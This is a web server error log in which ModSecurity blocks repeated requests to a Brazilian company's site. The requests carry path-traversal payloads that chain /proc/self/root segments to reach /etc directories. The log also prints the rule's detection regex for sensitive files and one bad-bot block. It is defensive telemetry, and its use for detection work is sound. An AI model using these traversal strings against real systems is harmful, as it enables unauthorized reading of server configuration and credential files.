[Mon Mar 16 08:30:51.613426 2026] [:error] [pid 11972:tid 140411741927168] [client 74.7.241.46:56944] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfp65qj1wV0Si-OkefOJgAAAAA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:30:58.419716 2026] [:error] [pid 21805:tid 140411590858496] [client 74.7.241.46:56946] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfp8rABkC4fWIHEf8HRLAAAAFI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:31:00.874986 2026] [:error] [pid 10651:tid 140411607643904] [client 74.7.241.46:51944] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfp9LysWC90G-1nBrArngAAAZA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:31:11.947670 2026] [:error] [pid 21946:tid 140411741927168] [client 74.7.241.46:51956] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfp_3bQATo66fKoS7wv6gAAAMA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:31:41.381354 2026] [:error] [pid 21806:tid 140411708356352] [client 74.7.243.203:34584] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfqHdSswJuvopo3lOhF8QAAAIQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:31:46.266119 2026] [:error] [pid 10831:tid 140411699963648] [client 74.7.243.203:41450] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfqIo6lpbStxTqkSktSsgAAAkU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:32:10.616081 2026] [:error] [pid 10651:tid 140411733534464] [client 74.7.241.46:33668] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfqOrysWC90G-1nBrAr2gAAAYE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:32:14.119766 2026] [:error] [pid 10709:tid 140411683178240] [client 74.7.241.46:46698] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfqPhXjF1vJNtV6CWrf2wAAAcc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:32:21.618920 2026] [:error] [pid 11972:tid 140411540502272] [client 74.7.241.46:46710] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfqRZqj1wV0Si-OkefOUwAAABg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:32:22.950955 2026] [:error] [pid 10709:tid 140411691570944] [client 74.7.241.46:43440] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfqRhXjF1vJNtV6CWrf3gAAAcY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:32:26.264102 2026] [:error] [pid 10831:tid 140411658000128] [client 74.7.241.46:43448] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfqSo6lpbStxTqkSktSvAAAAko"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:32:31.195618 2026] [:error] [pid 10772:tid 140411649607424] [client 74.7.241.46:43458] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfqT_9ocpUE4ed4uDzTrAAAAgs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:32:54.859598 2026] [:error] [pid 11972:tid 140411741927168] [client 74.7.244.31:34332] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfqZpqj1wV0Si-OkefOYQAAAAA"]
[Mon Mar 16 08:33:20.269076 2026] [:error] [pid 21805:tid 140411607643904] [client 74.7.243.203:41462] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfqgLABkC4fWIHEf8HRmAAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:33:23.674548 2026] [:error] [pid 21946:tid 140411649607424] [client 74.7.243.203:52300] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfqg3bQATo66fKoS7wweAAAAMs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:33:25.027021 2026] [:error] [pid 21946:tid 140411658000128] [client 74.7.243.203:52312] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfqhXbQATo66fKoS7wwewAAAMo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:33:33.936366 2026] [:error] [pid 21805:tid 140411649607424] [client 74.7.243.203:52322] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfqjbABkC4fWIHEf8HRoQAAAEs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:33:37.021915 2026] [:error] [pid 32654:tid 140411741927168] [client 74.7.243.203:36136] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfqkQlT9VtDQc7bgUyOLwAAAQA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:33:49.291372 2026] [:error] [pid 21805:tid 140411590858496] [client 74.7.243.203:36138] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfqnbABkC4fWIHEf8HRsQAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:33:50.578853 2026] [:error] [pid 10831:tid 140411741927168] [client 74.7.243.203:55168] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfqno6lpbStxTqkSktS3gAAAkA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:33:53.986592 2026] [:error] [pid 21805:tid 140411708356352] [client 74.7.243.203:55172] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfqobABkC4fWIHEf8HRtgAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:34:19.386980 2026] [:error] [pid 21946:tid 140411658000128] [client 74.7.241.46:39630] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfqu3bQATo66fKoS7ww5wAAAMo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:34:20.711104 2026] [:error] [pid 11972:tid 140411733534464] [client 74.7.241.46:43078] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfqvJqj1wV0Si-OkefOcAAAAAE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:34:22.950698 2026] [:error] [pid 21533:tid 140411658000128] [client 74.7.241.46:43088] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfqvnjZBu2q05ozVU87BgAAAUo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
